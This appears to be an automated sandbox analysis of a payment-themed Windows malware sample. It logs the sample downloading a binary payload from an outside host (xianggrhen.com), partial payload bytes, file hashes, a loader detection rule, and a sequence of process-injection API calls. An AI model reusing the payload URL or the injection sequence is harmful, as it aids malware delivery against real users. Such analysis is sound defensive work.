                                0192.168.2.104970845.9.191.182807724C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
                                TimestampBytes transferredDirectionData
                                Dec 6, 2024 11:05:29.461133957 CET83OUTGET /camp/Reibbfkkyy.dat HTTP/1.1
                                Host: xianggrhen.com
                                Connection: Keep-Alive
                                Dec 6, 2024 11:05:30.698776007 CET267INHTTP/1.1 200 OK
                                etag: "13e408-6752bd24-17b249;;;"
                                last-modified: Fri, 06 Dec 2024 09:00:20 GMT
                                content-type: application/octet-stream
                                content-length: 1303560
                                accept-ranges: bytes
                                date: Fri, 06 Dec 2024 10:05:30 GMT
                                server: LiteSpeed
                                connection: Keep-Alive
                                Dec 6, 2024 11:05:30.698884964 CET1236INData Raw: 95 4f 86 fe de cf 7c 86 b4 d1 ce bb 6a bc 46 ab 49 55 f2 6d 1b 23 9b ce d6 15 ef 93 34 e2 eb 6d 37 35 94 03 b7 12 59 0d 05 4d fc 90 5c c6 87 8c 3c 3d b7 cd 05 c1 69 fc 5b c2 1a 55 bb 62 0d 47 8c 5c 05 5f 48 46 40 3f cf 05 f3 96 94 09 46 06 82 a2
                                Data Ascii: O|jFIUm#4m75YM\<=i[UbG\_HF@?Fu#{*zy^bxqf<%]s7~k^LjtNI]?qJ/O4QgoDb=;z^{Cb.QB]R3*"M*< j]T-FmJd
                                Dec 6, 2024 11:05:30.698945999 CET1236INData Raw: 8b b4 11 ec 9b 29 7e d1 cc 87 6b 3a fb 84 a0 b2 61 35 38 a6 63 b5 cc 97 12 aa 24 a4 9c be 53 a1 bf fd b5 0b 23 d0 ef b9 25 80 6e 58 a4 b4 b9 16 ff 18 29 76 75 fe fd 1e cf a5 2d 36 5d b5 8b bb dc 1c 66 98 39 c8 1a 2c 75 23 d6 51 59 63 d5 93 55 cf
                                Data Ascii: )~k:a58c$S#%nX)vu-6]f9,u#QYcUOI_VxY#LU'@30O^TIx1CghuBL9_!^,pox,CR(#0kOMJqZ%sIdY=Wl6y*(V
                                Dec 6, 2024 11:05:30.698959112 CET448INData Raw: 94 33 06 95 42 f2 ed da cf b0 e8 27 f8 2d f0 b9 73 a0 02 ee 98 d2 62 eb a0 b2 31 06 58 42 52 19 cf 12 a3 16 4d ee b5 f3 8a 81 4f e8 f3 82 9c 14 ce 1f f0 62 f9 40 3f e8 0b dd 33 20 f7 eb 6e b5 ea 4f fe 01 8a 09 12 17 72 61 4d c4 ad 7f 4b b0 b8 7c
                                Data Ascii: 3B'-sb1XBRMOb@?3 nOraMK|7Ty86#6e]0J`T2sfex~ocQ.D>qXrhy;[3fC`Vz*D?.\YOPu``%c.`/Ynz6P3 a,
                                Dec 6, 2024 11:05:30.698971987 CET1236INData Raw: 7b 5f 7a 30 ad 81 09 d5 b6 06 a9 84 56 32 c5 29 c3 37 1c 81 bc bf ec 69 70 87 6e 2b 65 96 70 c8 e4 7a ba dd 9f 5d 5e 57 7c ea 2b 3d 85 78 be f7 fc 54 aa 3b 8d 3e 3a d4 6c c8 a4 87 6f 97 a6 8a 78 48 eb fd 41 e1 1c 8c 9e e6 21 56 20 f3 ff c2 75 fb
                                Data Ascii: {_z0V2)7ipn+epz]^W|+=xT;>:loxHA!V u_WD!s"y95A$>@Tuh?aOeY2smeo{ qJPuoE8D9;i3Q43 K02wbD^Ko'e:rw,V'a
                                Dec 6, 2024 11:05:30.699047089 CET1236INData Raw: 72 60 c2 26 47 c9 c4 e2 be 64 4b e4 77 05 78 1a bf 4b 7a 78 0f 5d 30 0b 0a ec a8 35 ea 8a 34 1e 89 a3 cf 0f ed 56 3f 96 a0 bd 1c e2 3c ed 78 1a 86 ce 32 1b 26 c9 a0 33 08 fd 31 f5 3e 3f 0e 98 bc 46 01 c8 a7 93 7c cb 2f 7c cd c1 08 7a 99 8f a6 c3
                                Data Ascii: r`&GdKwxKzx]054V?<x2&31>?F|/|z&}l43l}8YiFWQX[o`>?c79q06#&MAQjw{yI>;[{lx&h ja+Ug-tib
                                Dec 6, 2024 11:05:30.699111938 CET1236INData Raw: 74 48 35 61 6a 69 3a 42 66 f4 52 5e 2c a9 05 df 67 f3 b6 c9 89 30 f0 54 ee 90 8d ea e0 a6 7d 5b 3d 10 93 0e e2 98 a2 f0 98 b3 ab 7d 06 32 33 66 b8 78 2d 7c 73 41 9e 40 bb fb 7f bd cd 6d 70 25 a0 7b d7 c3 ec 9e 42 8c ac 18 4a 9a 0c b8 0b 35 c9 2a
                                Data Ascii: tH5aji:BfR^,g0T}[=}23fx-|sA@mp%{BJ5*LTA`q?z@osz-n3Yhsv?,5X{Xrh-RRfNJcRz"e9FVWU8Y-wgzo?5tn'u_!U\*^
                                Dec 6, 2024 11:05:30.699126005 CET1236INData Raw: 35 92 d9 f0 48 0d b7 f1 0c ae ba 6a 82 1f 2d 58 bb cc d4 4d e7 58 2a de fc e3 92 2f 8d dd 82 da 9e c8 8f 5b 87 d7 d9 20 eb 83 56 7b a5 c5 00 1b 46 79 a8 79 3d 4a f3 65 70 88 66 3a 96 7a f7 4c 4e e0 b5 06 92 a8 bd 03 6b 98 e7 0c c6 55 b6 95 ed 34
                                Data Ascii: 5Hj-XMX*/[ V{Fyy=Jepf:zLNkU4r[!T4|]VR*yTL!1Z1H!=j!^n[pUa,s^{#q/Xfx?+h/sDS<\{:X}pPhQT!@]sWWj*
                                Dec 6, 2024 11:05:30.699137926 CET1236INData Raw: 0d 24 70 c5 bc bc 2f 62 87 6a 19 05 ab 8b 59 5a 52 33 70 72 46 da ff 83 dc 91 3b 49 3f 3f cd 2d c9 3c 57 bf cf b6 ee d7 29 52 3d 34 1d b3 25 fd d5 ae 59 cc cb 98 c0 9a 5d b4 ba 9c 9c fe 75 f0 67 e8 ac 2d 0b cb df 98 2b 4b d8 04 8b 1f fc 3b b5 c3
                                Data Ascii: $p/bjYZR3prF;I??-<W)R=4%Y]ug-+K;2t[#!-y%meB-]8:?>1\!!:!isAj"4RIP01?[[")L0TF!U'lzy'E{-#mGc7nJ%q
                                Dec 6, 2024 11:05:30.699150085 CET1236INData Raw: fc 4f cb ef 57 5b 24 8d 47 c9 31 d4 05 26 f9 3b 47 ac 4b a8 b7 af 25 ba c4 96 85 b6 65 35 94 9c 50 8d b4 f1 4f d4 70 8f 7a b7 f2 5d 2e 31 d6 e9 ca a3 f2 8b 0e 7d 3f 8a be ac 7a 68 49 0f de df 13 01 10 9f 8d a1 fc 61 e9 9f c6 50 24 b4 49 fc 30 f2
                                Data Ascii: OW[$G1&;GK%e5POpz].1}?zhIaP$I0{5ECQI1q:=]n'xt0;P`Xca[hOHdU~Qc}g`&/ikT+<k*#;!sBZ^y(k6xGNd~nc
                                Dec 6, 2024 11:05:30.820609093 CET1236INData Raw: d8 69 f7 c3 59 b2 f9 c3 53 6c c7 44 f5 95 ac 19 62 74 f3 e2 bc cf 30 ac 65 4d c7 29 d3 ea e1 22 8f 99 4d 94 24 28 72 ff d7 f7 56 36 03 63 e7 0a cf 6b 4b dd 62 a1 91 18 d1 c4 c7 9a dc 96 5b 17 fa 84 7b af 63 23 08 03 fd 05 45 cf c4 d5 0c 27 81 74
                                Data Ascii: iYSlDbt0eM)"M$(rV6ckKb[{c#E'tKPJ(?,d07"+t+"kR<|>dKp%fc@V,;|RxzP7w-|POSeuB@kiZr"F!gz(ya^[t


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:05:05:27
                                Start date:06/12/2024
                                Path:C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe"
                                Imagebase:0x400000
                                File size:1'845'544 bytes
                                MD5 hash:622B4FB4E2D8E9A803F526A77C867590
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1644753165.00000000065B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1626618213.0000000002904000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:3
                                Start time:05:05:59
                                Start date:06/12/2024
                                Path:C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe"
                                Imagebase:0x2c0000
                                File size:1'845'544 bytes
                                MD5 hash:622B4FB4E2D8E9A803F526A77C867590
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:false

                                Target ID:6
                                Start time:05:05:59
                                Start date:06/12/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8140 -s 1168
                                Imagebase:0x790000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:6.5%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:33.3%
                                  Total number of Nodes:18
                                  Total number of Limit Nodes:0
                                  execution_graph 19629 5656680 19630 56566c8 NtResumeThread 19629->19630 19632 56566fd 19630->19632 19641 5655d50 19642 5655d90 VirtualAllocEx 19641->19642 19644 5655dcd 19642->19644 19621 5654528 19622 5654576 NtProtectVirtualMemory 19621->19622 19624 56545c0 19622->19624 19625 5655ff8 19626 5656040 WriteProcessMemory 19625->19626 19628 5656097 19626->19628 19633 5655748 19634 565578d Wow64SetThreadContext 19633->19634 19636 56557d5 19634->19636 19637 5654f88 19638 5654fec CreateProcessA 19637->19638 19640 5655174 19638->19640

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 27ee3c0-27ee3e1 1 27ee3e8-27ee4cf 0->1 2 27ee3e3 0->2 4 27ee4d5-27ee616 call 27ea590 1->4 5 27eebd1-27eebf9 1->5 2->1 51 27ee61c-27ee677 4->51 52 27eeb9a-27eebc4 4->52 8 27ef2ff-27ef308 5->8 10 27ef30e-27ef325 8->10 11 27eec07-27eec11 8->11 12 27eec18-27eed0c call 27ea590 11->12 13 27eec13 11->13 34 27eed0e-27eed1a 12->34 35 27eed36 12->35 13->12 36 27eed1c-27eed22 34->36 37 27eed24-27eed2a 34->37 38 27eed3c-27eed5c 35->38 40 27eed34 36->40 37->40 42 27eed5e-27eedb7 38->42 43 27eedbc-27eee3c 38->43 40->38 55 27ef2fc 42->55 63 27eee3e-27eee91 43->63 64 27eee93-27eeed6 call 27ea590 43->64 60 27ee67c-27ee687 51->60 61 27ee679 51->61 65 27eebce 52->65 66 27eebc6 52->66 55->8 62 27eeaaf-27eeab5 60->62 61->60 67 27ee68c-27ee6aa 62->67 68 27eeabb-27eeb37 call 27e20e8 62->68 95 27eeee1-27eeeea 63->95 64->95 65->5 66->65 70 27ee6ac-27ee6b0 67->70 71 27ee701-27ee716 67->71 111 27eeb84-27eeb8a 68->111 70->71 74 27ee6b2-27ee6bd 70->74 76 27ee71d-27ee733 71->76 77 27ee718 71->77 78 27ee6f3-27ee6f9 74->78 82 27ee73a-27ee751 76->82 83 27ee735 76->83 77->76 86 27ee6bf-27ee6c3 78->86 87 27ee6fb-27ee6fc 78->87 84 27ee758-27ee76e 82->84 85 27ee753 82->85 83->82 91 27ee775-27ee77c 84->91 92 27ee770 84->92 85->84 89 27ee6c9-27ee6e1 86->89 90 27ee6c5 86->90 94 27ee77f-27ee7ea 87->94 96 27ee6e8-27ee6f0 89->96 97 27ee6e3 89->97 90->89 91->94 92->91 98 27ee7fe-27ee9b3 94->98 99 27ee7ec-27ee7f8 94->99 101 27eef4a-27eef59 95->101 96->78 97->96 109 27eea17-27eea2c 98->109 110 27ee9b5-27ee9b9 98->110 99->98 102 27eeeec-27eef14 101->102 103 27eef5b-27eefe3 101->103 104 27eef1b-27eef44 102->104 105 27eef16 102->105 138 27ef15c-27ef168 103->138 104->101 105->104 115 27eea2e 109->115 116 27eea33-27eea54 109->116 110->109 117 27ee9bb-27ee9ca 110->117 113 27eeb8c-27eeb92 111->113 114 27eeb39-27eeb81 111->114 113->52 114->111 115->116 118 27eea5b-27eea7a 116->118 119 27eea56 116->119 121 27eea09-27eea0f 117->121 126 27eea7c 118->126 127 27eea81-27eeaa1 118->127 119->118 124 27ee9cc-27ee9d0 121->124 125 27eea11-27eea12 121->125 128 27ee9da-27ee9fb 124->128 129 27ee9d2-27ee9d6 124->129 132 27eeaac 125->132 126->127 130 27eeaa8 127->130 131 27eeaa3 127->131 134 27ee9fd 128->134 135 27eea02-27eea06 128->135 129->128 130->132 131->130 132->62 134->135 135->121 140 27ef16e-27ef1c9 138->140 141 27eefe8-27eeff1 138->141 156 27ef1cb-27ef1fe 140->156 157 27ef200-27ef22a 140->157 142 27eeffa-27ef150 141->142 143 27eeff3 141->143 161 27ef156 142->161 143->142 145 27ef0cf-27ef10f 143->145 146 27ef08a-27ef0ca 143->146 147 27ef045-27ef085 143->147 148 27ef000-27ef040 143->148 145->161 146->161 147->161 148->161 165 27ef233-27ef2c6 156->165 157->165 161->138 169 27ef2cd-27ef2ed 165->169 169->55
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Teq$pq$xbq
                                  • API String ID: 0-2374184423
                                  • Opcode ID: 503dc0c33931174630e79ba0cc95fbf4b3e9f643986dde1ba14b49957af2506d
                                  • Instruction ID: 210c9091b61a314c0da861779b9be015b27c6bac5c9a034f889994cc10102dc6
                                  • Opcode Fuzzy Hash: 503dc0c33931174630e79ba0cc95fbf4b3e9f643986dde1ba14b49957af2506d
                                  • Instruction Fuzzy Hash: 11A2D574A00228CFDB64CF69C884B99BBB2FF89314F1581E9D509AB325DB319E81CF50

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 171 5650f30-5650f51 172 5650f53 171->172 173 5650f58-5650fe2 171->173 172->173 261 5650fe8 call 5651a99 173->261 262 5650fe8 call 5651aa8 173->262 178 5650fee-565103b 181 565103d-5651048 178->181 182 565104a 178->182 183 5651054-565116f 181->183 182->183 194 5651181-56511ac 183->194 195 5651171-5651177 183->195 196 5651978-5651994 194->196 195->194 197 56511b1-5651314 196->197 198 565199a-56519b5 196->198 208 5651326-56514bb 197->208 209 5651316-565131c 197->209 219 5651520-565152a 208->219 220 56514bd-56514c1 208->220 209->208 223 5651751-5651770 219->223 221 56514c3-56514c4 220->221 222 56514c9-565151b 220->222 224 56517f6-5651861 221->224 222->224 225 5651776-56517a0 223->225 226 565152f-5651675 223->226 242 5651873-56518be 224->242 243 5651863-5651869 224->243 232 56517f3-56517f4 225->232 233 56517a2-56517f0 225->233 254 565167b-5651747 226->254 255 565174a-565174b 226->255 232->224 233->232 245 56518c4-565195c 242->245 246 565195d-5651975 242->246 243->242 245->246 246->196 254->255 255->223 261->178 262->178
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8
                                  • API String ID: 0-4194326291
                                  • Opcode ID: d2206f283001a251ae31b09fa7b6b905a0778eb35b8f0308eabe44d5476e630c
                                  • Instruction ID: be559a0fbcfe0bf96861160a72264d62c86d0083024f328c0509bd3ad09628f2
                                  • Opcode Fuzzy Hash: d2206f283001a251ae31b09fa7b6b905a0778eb35b8f0308eabe44d5476e630c
                                  • Instruction Fuzzy Hash: BA52D875E006298FDB64DF69C854AD9B7B2FF89310F1085EAD809A7354DB30AE85CF90

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 503 5654520-56545be NtProtectVirtualMemory 506 56545c7-56545ec 503->506 507 56545c0-56545c6 503->507 507->506
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 056545B1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 5da8847746d68f42c1a5aaba1688fedd3db548eb465285b3b8c4ca264d44f24d
                                  • Instruction ID: d6aa2cf2be6043f8d94ee925ee01d37035646243ba34ecc1c68e7bd78f03eadb
                                  • Opcode Fuzzy Hash: 5da8847746d68f42c1a5aaba1688fedd3db548eb465285b3b8c4ca264d44f24d
                                  • Instruction Fuzzy Hash: CE21F0B5D003099FDB10CFAAD580BEEFBF5BF48220F20842AE959A7210C7759941CBA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 522 5654528-56545be NtProtectVirtualMemory 525 56545c7-56545ec 522->525 526 56545c0-56545c6 522->526 526->525
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 056545B1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: d19e319a19fc8135ccb49772028283b910afd2dacec9253f1af84556524e50e8
                                  • Instruction ID: cf4282aa01b32e5c2d8c5d474be0e6cf259d9ec1f442384767b00e0c743dcec7
                                  • Opcode Fuzzy Hash: d19e319a19fc8135ccb49772028283b910afd2dacec9253f1af84556524e50e8
                                  • Instruction Fuzzy Hash: E321F3B1D003499FDB10DFAAD580BAEFBF5FF48310F10842AE919A7210C775A941CBA0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 540 5656678-56566fb NtResumeThread 543 5656704-5656729 540->543 544 56566fd-5656703 540->544 544->543
                                  APIs
                                  • NtResumeThread.NTDLL(?,?), ref: 056566EE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: d59c5b06a71cb078a2da3a28776aff0124f8492a4a37256f2e0cc5168955b82d
                                  • Instruction ID: 81b75eaff4f29002b8799e57ffe79e11e0534fe6929f95c4cb530f2eb2cc1e0d
                                  • Opcode Fuzzy Hash: d59c5b06a71cb078a2da3a28776aff0124f8492a4a37256f2e0cc5168955b82d
                                  • Instruction Fuzzy Hash: 0A1167B1D003088FDB20DFAAC485BEEFBF4BF48220F14852AD859A7240C7749945CFA1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 557 5656680-56566fb NtResumeThread 560 5656704-5656729 557->560 561 56566fd-5656703 557->561 561->560
                                  APIs
                                  • NtResumeThread.NTDLL(?,?), ref: 056566EE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: d3dc86629f7da73e03f9f194140b0652bcef7f64445f0fd2d4ea6cf4d7863c72
                                  • Instruction ID: 19a3614d49d9fc9e85d073674623f00913c4530b4aa7103773d0f79d0b35733d
                                  • Opcode Fuzzy Hash: d3dc86629f7da73e03f9f194140b0652bcef7f64445f0fd2d4ea6cf4d7863c72
                                  • Instruction Fuzzy Hash: 2F1129B1D003498FDB20DFAAC4847AEFBF4FF48224F50842AD859A7240CB75A945CFA5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: h
                                  • API String ID: 0-2439710439
                                  • Opcode ID: 688626fb828b82e2427b28c18501453b5169c79e8e08e79219e63f14a2a564c2
                                  • Instruction ID: ff5f2693bb3c6ed68a40309262f108939c8e919498f745cb769ab724d353fce0
                                  • Opcode Fuzzy Hash: 688626fb828b82e2427b28c18501453b5169c79e8e08e79219e63f14a2a564c2
                                  • Instruction Fuzzy Hash: 0B71E875E006298BEB64DF69C844BDAB7B2FB89310F1081EAD509A7354DB305E85CF90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8a117d62098764e69c1e141783d7116e2fadc3e234664d8a74ebdc5361047dfc
                                  • Instruction ID: 29e6d1fedaa9e6b581d76257e59267d7fb0a07298818607d9a986006925e813f
                                  • Opcode Fuzzy Hash: 8a117d62098764e69c1e141783d7116e2fadc3e234664d8a74ebdc5361047dfc
                                  • Instruction Fuzzy Hash: 9FD1AE74E00618CFDB54DFA9D994B9DBBF2BF89300F2481A9D409AB365DB31A981CF50

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 263 27ef6b0-27ef6d3 264 27ef6d5-27ef6e0 263->264 265 27ef6e2-27ef6eb 263->265 264->265 266 27ef6ee-27ef722 264->266 269 27ef724-27ef73c 266->269 270 27ef773-27ef79a 266->270 269->270 275 27ef73e-27ef769 269->275 273 27ef98d-27ef99f 270->273 274 27ef7a0 270->274 282 27ef9be-27ef9c4 273->282 283 27ef9a1-27ef9b9 273->283 277 27ef7a9-27ef7b1 274->277 275->270 279 27ef76b-27ef770 275->279 280 27ef7ba-27ef7bd 277->280 281 27ef7b3 277->281 279->270 299 27ef93d-27ef95f 280->299 300 27ef7c3-27ef7c6 280->300 281->280 286 27ef91f-27ef93b 281->286 287 27ef8da-27ef8ec 281->287 288 27ef858-27ef86a 281->288 289 27ef8b9-27ef8d5 281->289 290 27ef7d1-27ef7e3 281->290 291 27ef8f1-27ef905 281->291 292 27ef86f-27ef883 281->292 293 27ef90a-27ef91d 281->293 294 27ef888-27ef89c 281->294 295 27ef828-27ef83b 281->295 296 27ef7e8-27ef823 281->296 297 27ef840-27ef853 281->297 298 27ef8a1-27ef8b4 281->298 284 27ef9c6-27ef9cd 282->284 285 27ef9d3-27efa1b 282->285 283->282 313 27ef9bb 283->313 284->285 302 27ef9cf-27ef9d1 284->302 326 27efa23 285->326 286->273 287->273 288->273 289->273 290->273 291->273 292->273 293->273 294->273 295->273 296->273 297->273 298->273 299->273 303 27ef7cc 300->303 304 27ef961-27ef98b 300->304 315 27efa25-27efa27 302->315 303->273 304->273 313->282 323 27efa2d-27efa36 315->323 324 27efd4b-27efd54 315->324 327 27efa48-27efa88 323->327 328 27efa38-27efa40 323->328 326->315 334 27efa9c 327->334 335 27efa8a-27efa9a 327->335 328->327 336 27efa9e-27efaa0 334->336 335->334 335->336 338 27efabf-27efaee 336->338 339 27efaa2-27efabd 336->339 344 27efb2b-27efb33 338->344 349 27efaf0-27efb1c 338->349 339->344 345 27efb35-27efb3f 344->345 346 27efb41 344->346 348 27efb46-27efb48 345->348 346->348 350 27efb4a-27efb50 348->350 351 27efb58-27efbca 348->351 349->344 357 27efb1e-27efb22 349->357 350->351 359 27efbee-27efc14 351->359 360 27efbcc-27efbe3 351->360 357->344 362 27efc2b 359->362 363 27efc16-27efc21 359->363 360->359 364 27efc2d-27efc4c 362->364 365 27efc29 363->365 364->324 367 27efc52-27efc64 364->367 365->364 367->324 369 27efc6a-27efc82 367->369 371 27efcbb-27efcd3 369->371 372 27efc84-27efc8d 369->372 377 27efcd5-27efcde 371->377 378 27efd03-27efd1b 371->378 373 27efc8f-27efc92 372->373 374 27efc9c-27efca3 372->374 373->374 374->371 375 27efca5-27efcb6 374->375 375->324 380 27efced-27efcf6 377->380 381 27efce0-27efce3 377->381 378->324 384 27efd1d-27efd26 378->384 380->378 382 27efcf8-27efd00 380->382 381->380 382->378 386 27efd28-27efd2b 384->386 387 27efd35-27efd3e 384->387 386->387 387->324 388 27efd40-27efd48 387->388 388->324
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (_q
                                  • API String ID: 0-3590916094
                                  • Opcode ID: 3d9faf3772a6c7e697a2f22aa06d5eac6b1c27f42acb7421d38bfef1e9471f19
                                  • Instruction ID: d86205148b78e626757ee32f55b5844df5d99ffc16a28effdc0f374cfc476474
                                  • Opcode Fuzzy Hash: 3d9faf3772a6c7e697a2f22aa06d5eac6b1c27f42acb7421d38bfef1e9471f19
                                  • Instruction Fuzzy Hash: CB227A35A002149FDB14DF69D495A6DBBF2BF88304F188069E906EB7A5CB71ED40CBA1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 390 5654f7f-5654ff8 392 5655031-5655051 390->392 393 5654ffa-5655004 390->393 400 5655053-565505d 392->400 401 565508a-56550c4 392->401 393->392 394 5655006-5655008 393->394 395 565502b-565502e 394->395 396 565500a-5655014 394->396 395->392 398 5655016 396->398 399 5655018-5655027 396->399 398->399 399->399 402 5655029 399->402 400->401 403 565505f-5655061 400->403 407 56550c6-56550d0 401->407 408 56550fd-5655172 CreateProcessA 401->408 402->395 405 5655084-5655087 403->405 406 5655063-565506d 403->406 405->401 409 5655071-5655080 406->409 410 565506f 406->410 407->408 411 56550d2-56550d4 407->411 420 5655174-565517a 408->420 421 565517b-56551c3 408->421 409->409 412 5655082 409->412 410->409 413 56550f7-56550fa 411->413 414 56550d6-56550e0 411->414 412->405 413->408 416 56550e4-56550f3 414->416 417 56550e2 414->417 416->416 418 56550f5 416->418 417->416 418->413 420->421 426 56551c5-56551c9 421->426 427 56551d3-56551d7 421->427 426->427 428 56551cb 426->428 429 56551e7-56551eb 427->429 430 56551d9-56551dd 427->430 428->427 431 56551ed-56551f1 429->431 432 56551fb 429->432 430->429 433 56551df 430->433 431->432 434 56551f3 431->434 435 56551fc 432->435 433->429 434->432 435->435
                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05655162
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: e957b6385dc243c374ecb64709278a7d28925f658f9deca947229b3119c055ad
                                  • Instruction ID: 8771d6e0ea6169ff7390df6e23e4bd64543226677657f163906d7f2d0552cbbd
                                  • Opcode Fuzzy Hash: e957b6385dc243c374ecb64709278a7d28925f658f9deca947229b3119c055ad
                                  • Instruction Fuzzy Hash: FE812671D006599FDB20DFA9C8897AEBBF2BF48324F148529EC56A7740E7758881CF81

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
